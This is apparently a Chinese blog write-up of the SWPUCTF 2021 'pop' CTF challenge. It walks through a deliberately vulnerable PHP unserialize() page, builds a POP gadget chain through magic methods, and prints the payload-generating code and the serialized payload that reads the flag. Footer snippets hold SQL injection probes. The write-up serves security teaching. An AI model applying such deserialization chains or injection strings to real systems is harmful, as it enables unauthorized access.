[SWPUCTF 2021 新生赛]pop-----WP

最新推荐文章于 2024-03-27 16:45:38 发布
最新推荐文章于 2024-03-27 16:45:38 发布
阅读量352 收藏 2
点赞数 5
文章标签: web安全 php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pythllc/article/details/133995586
版权

[SWPUCTF 2021 新生赛]pop

文章目录


源码展示 

 <?php

error_reporting(0);
show_source("index.php");

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

class w22m{
    public $w00m;
    public function __destruct(){
        echo $this->w00m;
    }
}

class w33m{
    public $w00m;
    public $w22m;
    public function __toString(){
        $this->w00m->{$this->w22m}();
        return 0;
    }
}

$w00m = $_GET['w00m'];
unserialize($w00m);

?>

一、构造pop链

观察源码发现有多个类,即有多个class定义,w44m,w22m,w33m这三个都是类,由此可以判断出来,该题应该是反序列化中的构造pop链的题目。

POP链:POP(面向属性编程)链是指从现有运行环境中寻找一系列的代码或指令调用,然后根据需求构造出一组连续的调用链。

反序列化利用就是要找到合适的POP链。其实就是构造一条符合原代码需求的链条,去找到可以控制的属性或方法,从而构造POP链达到攻击的目的。

构造pop链方法:从链尾反推到链头即可构造!!!

1、构造pop链第一步,寻找链头

链头特征:能够被输入内容的并且能被用户所控制的

$w00m = $_GET['w00m'];
unserialize($w00m);

w00m是能被输入内容的,并且能被我们控制,即我们可以输入任意的内容而不被限制,所以w00m就是链头

2、构造pop链第二步,寻找链尾

链尾特征:可以读取文件或者能够执行命令的

class w44m{

    private $admin = 'aaa';
    protected $passwd = '123456';

    public function Getflag(){
        if($this->admin === 'w44m' && $this->passwd ==='08067'){
            include('flag.php');
            echo $flag;
        }else{
            echo $this->admin;
            echo $this->passwd;
            echo 'nono';
        }
    }
}

include('flag.php')
echo $flag
能够读取文件,输出flag,这就是链尾

3、构造pop链第三步,反推——标注

此时我们找到了链尾,正式开始构造pop链,从链尾反推到链头,由于我们需要实现echo $flag,所以我们需要满足if的条件,所以给admin和passwd分别赋为if中的条件,标注好

1代表第一步,shell代表我们将传入一个类似shell的东西

在这里插入图片描述
在这里插入图片描述

标注好后,要执行if,就需要执行Getflag()方法

这就需要我们在源码中找到能调用Getflag()的方法,方法的组成是方法名加(),在源码中就找这样的形式。

由此找到这,试想,若$this->w00m的值被赋为new w44m(),$this->w22m()被赋为Getflag,就可以调用该方法。

同时进行标注

在这里插入图片描述

在这里插入图片描述

需要执行上述过程,就需要触发__toString()魔术方法

__toString()             //把对象当作字符串使用时触发

寻找源码中,能把对象当作字符串的地方

若能将$this->w00m赋值为new w33m,便能触发__toString魔术方法。

同时进行标注

__destruct()             //对象被销毁时触发

在这里插入图片描述

在这里插入图片描述

我们传入内容后,程序执行完就会触发__destruct()

这样我们就从链尾反推到了链头,POP链便串好了

二、构造payload

1、首先复制源码到编辑器中

将不需要的部分注释掉(和赋值无关的都注释掉)

在这里插入图片描述

2、添加pop链和序列化代码

根据前面我们的分析,从pop链的链尾开始赋值

私有和保护属性,采用内部赋值

在这里插入图片描述

对象赋值采用外部赋值

在这里插入图片描述

若不进行url编码,私有和保护属性的部分,存在不可见字符,需要替换为\00,直接url编码则不需要

$a=new w44m();

$b=new w33m();
$b->w00m=$a;
$b->w22m=Getflag;

$t=new w22m();
$t->w00m=$b;
echo serialize($t);
echo "\n";
echo urlencode(serialize($t));

在这里插入图片描述

示例

O:4:"w22m":1:{s:4:"w00m";O:4:"w33m":2:{s:4:"w00m";O:4:"w44m":2:{s:11:"\00w44m\00admin";s:4:"w44m";s:9:"\00*\00passwd";s:5:"08067";}s:4:"w22m";s:7:"Getflag";}}

O%3A4%3A%22w22m%22%3A1%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w33m%22%3A2%3A%7Bs%3A4%3A%22w00m%22%3BO%3A4%3A%22w44m%22%3A2%3A%7Bs%3A11%3A%22%00w44m%00admin%22%3Bs%3A4%3A%22w44m%22%3Bs%3A9%3A%22%00%2A%00passwd%22%3Bs%3A5%3A%2208067%22%3B%7Ds%3A4%3A%22w22m%22%3Bs%3A7%3A%22Getflag%22%3B%7D%7D

验证payload,得到flag

在这里插入图片描述
如果觉得不错的话,给我点点赞吧

墨笙故君
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
[SWPUCTF 2021 新生]easy_sql
zoixsoadji的博客
05-06 1419
感谢平台Nssctf 进入题目,说是让我们输入点东西,f12打开源代码,发现要求我们传的参数是wllm 那么我们就传入一个wllm=1,发现有注入点 先查看有几个库:?wllm=-1' order by 1--+ ?wllm=-1' order by 2--+ ?wllm=-1' order by 3--+ 接下来查回显:?wllm=union select 1,2,3--+ 看到回显位是2,3,查库名:?wllm=-1' union select 1,2,databas.
Pop-up Photo Wall 1.6
08-09
Pop-up Photo Wall 1.6
[SWPUCTF 2021 新生]pop
weixin_68906365的博客
03-13 418
反序列化
SWPUCTF 2021 新生
weixin_44770698的博客
12-21 3408
SWPUCTF 2021 新生(日常练习)
[SWPUCTF 2021 新生]pop(NSSCTF)
m0_70819573的博客
03-03 294
phppop链的原理是构造不同类相互调用的链条,调用php的魔术方法来实现flag的读取。1.打开环境,审计代码。
php反序列化——pop链构造[SWPUCTF 2021 新生]pop [NISACTF 2022]babyserialize
最新发布
m0_73756016的博客
03-27 834
class w44m中的Getflag() -> class w33m中的__toString() -> class w22m中的 __destruct()$this->mw00->{$this->w22m}();的意思是调用当前对象的 w00m 属性中名为 $this->w22m 的方法。所以反推法第一步就是要调用Getflag()函数 找到$this->w00m->{$this->w22m}();mw00=w44m w22m = Getflag()即可调用Getflag()这题的链条是(反推)
360POP-P2(编程器固件)
12-09
360POP-P2(编程器固件)
POP-Animation:非CocoaPods版本的POP
06-13
POP-Animation 非 CocoaPods 版本的 POP,自 2015.04.10 官网 POP 的 master 版本修改而成 注意 Xcode6以上新建的项目中,需要创建出pch文件,并且在pch文件中添加以下代码 // // POP.pch // POP // // Created by ...
pop-handapp:POP Handapp
05-12
在压缩包文件"pop-handapp-master"中,我们可以期待找到以下内容: 1. 项目源代码:包含了项目的主工程文件(.xcodeproj),这是Xcode项目的基础,里面包含了所有的源代码、资源文件和配置信息。 2. 源代码目录:...
ld42-pop-mayhem:爆米花混乱游戏
02-06
《ld42-pop-mayhem:爆米花混乱游戏》是一款基于像素艺术风格的游戏,它在Ludum Dare 42(一个全球性的游戏制作比)中创作,并使用了Phaser 3框架。Ludum Dare是游戏开发者展示创新和技术实力的平台,参与者通常在...
[SWPUCTF 2021 新生]WEB刷题记录
m0_73239569的博客
11-16 141
往下看,w33m类的__toString()方法可以做到这一点,所以需要让$this->w00m为w44m类,而$this->w22m为“Getflag”。因此我们构造的东西($jay17),他是序列化后的w22m类,w22m类里面的变量w00m=w33m类,w33m类里面的变量w00m为w44m类,w33m类里面的变量w22m为w44m类里面的Getflag函数,并且w44m类的admin和password变量为w44m和08067。如果存在,它将获取该参数的值,并使用正则表达式检查是否包含空格。
NSS [SWPUCTF 2021 新生]pop
Jay17的博客
07-27 318
NSS [SWPUCTF 2021 新生]pop
CTF笔记 [SWPUCTF 2021 新生]pop
qq_51248658的博客
10-28 2574
这一类题目比较考验对一段代码的逻辑方面的理解,通过利用魔数方法进行互相调用,形成一条链子,利用这条链子将对象联系起来去拿flag。
"南昌航空大学计算机网络试题库精选资料(2021-2022)
"精品资料(2021-2022年收藏)南昌航空大学计算机网络试题库.doc"是一份包含了计算机网络试题的文档。试题库分为选择题和其他类型的题目。 首先是选择题部分。选择题有以下几个问题: 1. Internet 中发送邮件协议...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值